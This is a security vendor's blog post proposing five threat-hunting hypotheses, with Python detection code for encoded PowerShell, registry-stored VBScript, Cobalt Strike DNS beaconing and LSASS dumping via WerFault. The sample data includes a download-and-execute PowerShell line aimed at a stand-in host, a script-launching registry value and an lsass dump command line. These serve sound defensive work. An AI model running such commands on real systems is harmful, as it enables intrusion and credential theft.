Examples of Threat Hunting Hypotheses: Five Hunts to Start

Introduction

Structured threat hunting (often called hypothesis-based hunting) remains one of the best ways for organizations to find previously undetected threats in their environment. It works so well because it structures the hunt around a central proposition, and at the end of the hunt, hunt teams can tell, with a high degree of certainty, whether their organization has been impacted by a given adversary, behavior or technique. Despite this, hunters often struggle to come up with a hypothesis and build a hunt around it. As a result, we’ve put together a list of the best examples of starter threat-hunting hypotheses that teams can put into practice right away.

What is a hunting hypothesis?

Before diving into the list, we must first answer the question “what is a threat hunting hypothesis?”

A hypothesis is a “…provisional hypothesis made in order to derive and test its logical or empirical consequences”. A threat hunting hypothesis is quite similar: it is a proposition about a tactic, technique, or procedure, often derived from threat intelligence, security research, or the experience or intuition of an individual hunter, which is then provisionally assumed to be correct until a hunt can be carried out to conclusively prove or disprove its validity.

Although there is no set “format” for a threat hunting hypothesis, many hunters will try to maintain a standard format for their hunts. As you scroll through the top 5 list, you can click on the button associated with the Threat Hunting Hypothesis to see the hunt in HUNTER. If you don’t have a HUNTER account yet, get your free account here and use the promo code “HUNTHYPOTHESIS”.

Threat Hunting Hypothesis #1 – Potential Maldoc Execution Chain

Difficulty level: Easy

Hypothesis: Maldocs (malicious documents) are documents that contain self-executing code, or code that requires a user to grant permission or interact with the document before it executes. Maldocs are mostly delivered to users via phishing emails. In many cases, the user will need to interact with the document before any code will execute successfully. Once the document is opened and any required user interaction is performed, malicious code runs, such as PowerShell, cmd shell, or similar script code, to establish communication with the attacker’s infrastructure, download a payload, or perform local actions such as establishing persistence or sleeping until later.

Threat Hunting Hypothesis #2 – Executing Encoded PowerShell Commands

Difficulty level: Easy

Hypothesis: Once a moderately skilled attacker has gained initial access to a system, they are likely to use tools that already reside on the system to carry out their attack, or to use them as a means of bringing in other tools. This is because these native tools are less likely to be detected by traditional threat detection platforms, and their use is unlikely to garner much attention. This is especially true for tools like PowerShell, which allow an attacker to perform a wide range of attacks. In an effort to further obfuscate their PowerShell activity, attackers will likely use the EncodedCommand parameter to Base64-encode commands and arguments and so defeat simple string matching. Use of PowerShell’s EncodedCommand parameter should be investigated.
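A starting point for this hunt, as an added example rather than the HUNTER package itself: the function below takes process-creation events (constructed samples, with assumed `Host` and `CommandLine` fields), recognises the common spellings of `-EncodedCommand`, decodes the UTF-16LE Base64 blob that PowerShell expects, and flags decoded content that contains download-and-execute keywords.

```python
import base64
import re

# Common spellings PowerShell accepts for -EncodedCommand (assumed list, extend as needed).
ENC_FLAG = re.compile(r"^[-/](e|ec|enc|encodedcommand)$", re.I)
# Keywords that commonly appear in staged or obfuscated PowerShell (assumed watchlist).
SUSPICIOUS = re.compile(
    r"downloadstring|downloadfile|invoke-expression|\biex\b|frombase64string|net\.webclient",
    re.I,
)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an -EncodedCommand, else None."""
    argv = cmdline.split()
    for i, tok in enumerate(argv[:-1]):
        if not ENC_FLAG.match(tok):
            continue
        blob = argv[i + 1].strip("\"'")
        try:
            raw = base64.b64decode(blob, validate=True)
            # powershell.exe decodes the blob as UTF-16LE text; odd lengths or bad bytes fail here.
            return raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


def hunt_encoded_powershell(events):
    """Return one finding per event that used an encoded command, with a keyword flag."""
    hits = []
    for ev in events:
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is None:
            continue
        hits.append({"host": ev["Host"], "decoded": decoded,
                     "flagged": bool(SUSPICIOUS.search(decoded))})
    return hits


def _b64_utf16(script: str) -> str:
    """Helper used only to build the constructed sample events below."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events: one staged download, one benign admin task, one unencoded command.
SAMPLE_EVENTS = [
    {"Host": "ws01", "CommandLine": "powershell.exe -NoP -W Hidden -enc "
     + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')")},
    {"Host": "ws02", "CommandLine": "powershell.exe -ec " + _b64_utf16("Get-Service | Out-File C:\\temp\\svc.txt")},
    {"Host": "ws03", "CommandLine": "powershell.exe -Command Get-Date"},
]
```

Running `hunt_encoded_powershell(SAMPLE_EVENTS)` yields two findings, of which only the ws01 event is flagged; the plain `-Command` invocation is not an encoded command and is ignored.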

Threat Hunting Hypothesis #3 – Attempted Execution of VBScript Stored in a CurrentVersion Registry Key Value

Difficulty level: Medium

Hypothesis: The Windows Registry is a database of settings used by the Microsoft Windows operating system, its applications and basic utilities. The registry is often abused by adversaries to store configuration information, hide code, evade detection, inhibit system operation, and establish persistence, among other purposes. The “CurrentVersion” registry key in the HKCU (Current User) or HKLM (Local Machine) hives is one of the most used registry keys, specifically the Run key under CurrentVersion. Because of this, the Run key is closely monitored by detection and prevention tools. The technique targeted in this package uses only the CurrentVersion key itself to store malware configuration information and potentially establish persistence. This is probably due to the scrutiny the Run key receives from defensive tools.
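One way to hunt for this at scale, as an added example that is not the HUNTER package: export the CurrentVersion keys from endpoints in `.reg` format and scan the string values for VBScript markers or for values far larger than configuration data normally needs. The sample export and the marker list are constructed assumptions.

```python
import re

SECTION = re.compile(r"^\[(.+)\]$")                       # [HKEY_...\path] header line
STRING_VALUE = re.compile(r'^(?:@|"(?P<name>[^"]*)")="(?P<data>.*)"$')  # "name"="data" or @="data"
# Tokens that rarely belong in configuration data but are common in VBScript (assumed list).
VBS_MARKERS = re.compile(
    r"CreateObject\(|WScript\.Shell|Scripting\.FileSystemObject|\bExecute\(|vbscript:|"
    r"\bw?cscript(?:\.exe)?\b|\bwscript(?:\.exe)?\b|\.vbs\b",
    re.I,
)
WELL_KNOWN = ("\\run", "\\runonce")  # heavily monitored subkeys; the hunt targets their siblings


def find_scripts_in_reg_export(reg_text: str, min_len: int = 120):
    """Return string values under any CurrentVersion key that look like script or are oversized."""
    findings, key = [], None
    for line in reg_text.splitlines():
        line = line.strip()
        m = SECTION.match(line)
        if m:
            key = m.group(1)
            continue
        if key is None or "\\currentversion" not in key.lower():
            continue
        m = STRING_VALUE.match(line)
        if not m:
            continue  # hex:, dword: and multi-line values are not handled by this example
        name = m.group("name") if m.group("name") is not None else "(Default)"
        data = m.group("data")
        reasons = []
        if VBS_MARKERS.search(data):
            reasons.append("vbscript-marker")
        if len(data) >= min_len:
            reasons.append("oversized-value")
        if reasons:
            findings.append({"key": key, "value": name, "reasons": reasons,
                             "in_run_key": key.lower().endswith(WELL_KNOWN)})
    return findings


# Constructed sample export: a normal Run entry, a script hidden in a sibling key, and an unrelated key.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
"cfg"="Set o=CreateObject(\"WScript.Shell\"):o.Run \"C:\\Users\\Public\\upd.vbs\",0"

[HKEY_CURRENT_USER\Software\Vendor\App]
"script"="CreateObject(\"WScript.Shell\")"
"""
```

The Vendor key is skipped because it is outside CurrentVersion; the Run entry is under CurrentVersion but carries no marker, so only the Explorer value is reported.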

Threat Hunting Hypothesis #4 – Default Cobalt Strike Beacon Structure C2

Difficulty level: Medium

Hypothesis: Cobalt Strike is a comprehensive, commercially available penetration testing tool offered by Strategic Cyber LLC, based in Washington, DC. The tool is advertised for “Adversary Simulations and Red Team Ops”, but its extensive customization options and capabilities have led to its use by a wide variety of threat actors with a variety of motivations. Adversaries employing Cobalt Strike will often use its Beacon component when attempting to gain initial access. By default, the Beacon component uses a default command and control (C2) structure over DNS queries. Adversaries unfamiliar with Cobalt Strike may neglect to customize that C2 structure.
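A hunt over DNS resolver logs for an uncustomized DNS channel, as an added example rather than the HUNTER package: it groups queries by client and registrable domain and flags pairs with many distinct subdomains whose answers are mostly the idle response. It assumes the idle answer is `0.0.0.0` (the documented default of the `dns_idle` Malleable C2 option; confirm against the docs for the version you face) and uses a two-label approximation of the registrable domain instead of a public-suffix list. The log records are constructed.

```python
from collections import defaultdict


def registered_domain(qname: str) -> str:
    # Assumption: the last two labels are the registrable domain (no public-suffix list here).
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def hunt_dns_beacon(records, min_unique=8, idle_ratio=0.5, idle_answer="0.0.0.0"):
    """Flag (client, domain) pairs with many unique names answered mostly by the idle address."""
    stats = defaultdict(lambda: {"names": set(), "idle": 0, "total": 0})
    for rec in records:
        s = stats[(rec["client"], registered_domain(rec["query"]))]
        s["names"].add(rec["query"].lower())
        s["total"] += 1
        if rec["answer"] == idle_answer:
            s["idle"] += 1
    findings = []
    for (client, domain), s in stats.items():
        ratio = s["idle"] / s["total"]
        if len(s["names"]) >= min_unique and ratio >= idle_ratio:
            findings.append({"client": client, "domain": domain,
                             "unique_names": len(s["names"]), "idle_ratio": round(ratio, 2)})
    return findings


# Constructed sample: one host polling a domain with rotating hex-looking labels answered 0.0.0.0,
# one host repeatedly resolving a single web host, and one host fetching many CDN assets normally.
SAMPLE_DNS = (
    [{"client": "10.0.0.5", "query": f"{0x9a0 + i:08x}.api.updates.invalid", "answer": "0.0.0.0"}
     for i in range(12)]
    + [{"client": "10.0.0.7", "query": "www.example.com", "answer": "203.0.113.10"}] * 12
    + [{"client": "10.0.0.7", "query": f"asset{i}.cdn.example.net", "answer": f"198.51.100.{i}"}
       for i in range(12)]
)
```

Only the first host is reported: the second has one unique name, and the third has many unique names but real answers, which is how a CDN looks and why both conditions are required.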

Threat Hunting Hypothesis #5 – Dumping LSASS memory using WerFault.exe

Difficulty level: Medium

Hypothesis: The Local Security Authority Subsystem Service (LSASS) is a process within Windows operating systems that is responsible for enforcing various security policies on a system, including verifying user logons. Once a user logs on to the system, LSASS generates and stores credentials in the memory of the lsass.exe process. These credentials can be obtained by adversaries through various means, such as creating a memory dump of the process, and can then be used to perform lateral movement, privilege escalation, and various other attack methodologies.
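A detection over process-creation telemetry for this hypothesis, as an added example rather than the HUNTER package: it collects the PIDs of lsass.exe on each host and reports any WerFault.exe whose command line names one of them. Because Windows Error Reporting also launches WerFault.exe when lsass genuinely crashes, the severity is raised only when the parent is neither lsass.exe nor svchost.exe (an assumed baseline; the events and field names are constructed in a Sysmon-like shape).

```python
import re
from pathlib import PureWindowsPath

EXPECTED_PARENTS = {"lsass.exe", "svchost.exe"}  # assumed normal launchers for a real crash report


def _basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def hunt_lsass_dump_via_werfault(events):
    """Return WerFault.exe launches whose command line references a live lsass.exe PID."""
    lsass_pids = {}
    for e in events:
        if _basename(e["Image"]) == "lsass.exe":
            lsass_pids.setdefault(e["Host"], set()).add(e["ProcessId"])
    findings = []
    for e in events:
        if _basename(e["Image"]) != "werfault.exe":
            continue
        # Any standalone number on the command line that matches an lsass PID on the same host.
        tokens = {int(t) for t in re.findall(r"\b\d+\b", e["CommandLine"])}
        matched = tokens & lsass_pids.get(e["Host"], set())
        if not matched:
            continue
        parent = _basename(e["ParentImage"])
        findings.append({"host": e["Host"], "werfault_pid": e["ProcessId"],
                         "target_pid": min(matched), "parent": parent,
                         "severity": "review" if parent in EXPECTED_PARENTS else "high"})
    return findings


# Constructed sample events: lsass itself, a WerFault aimed at its PID from an odd parent,
# and an unrelated WerFault handling some other process.
SAMPLE_EVENTS = [
    {"Host": "dc01", "ProcessId": 688, "Image": "C:\\Windows\\System32\\lsass.exe",
     "ParentImage": "C:\\Windows\\System32\\wininit.exe", "CommandLine": "C:\\Windows\\system32\\lsass.exe"},
    {"Host": "dc01", "ProcessId": 5120, "Image": "C:\\Windows\\System32\\WerFault.exe",
     "ParentImage": "C:\\Users\\Public\\tool.exe",
     "CommandLine": "C:\\Windows\\System32\\WerFault.exe -u -p 688 -s 1180"},
    {"Host": "dc01", "ProcessId": 5300, "Image": "C:\\Windows\\System32\\WerFault.exe",
     "ParentImage": "C:\\Program Files\\App\\app.exe",
     "CommandLine": "C:\\Windows\\System32\\WerFault.exe -u -p 4412 -s 2000"},
]
```

The PID match is scoped per host so a coincidental PID collision on another machine does not fire; a file-creation feed showing a .dmp written by the same WerFault PID would be the natural second signal to join in.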

Conclusion

Did you like these hypotheses? Access dozens more by signing up for a HUNTER account today. Get your free account here and use promo code ‘HUNTHYPOTHESIS’.

The post Examples of Threat Hunting Hypotheses: Five Hunts to Start appeared first on Cyborg Security.

*** This is a syndicated blog from Cyborg Security’s Security Bloggers Network written by Josh Campbell. Read the original post at: https://www.cyborgsecurity.com/blog/threat-hunting-hypothesis-examples-five-hunts-to-start-out/